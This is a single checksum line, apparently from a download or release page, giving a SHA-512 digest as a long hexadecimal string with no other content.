SHA5125ea67fac41596652b0eeaf1f8d4e01fb6d2f2495c7e7185c22e7cac5187d3fc5d02e1649710c0ef30419c6b2805c4d947cf39eab5f31d8f0b72cf3e37e3a507c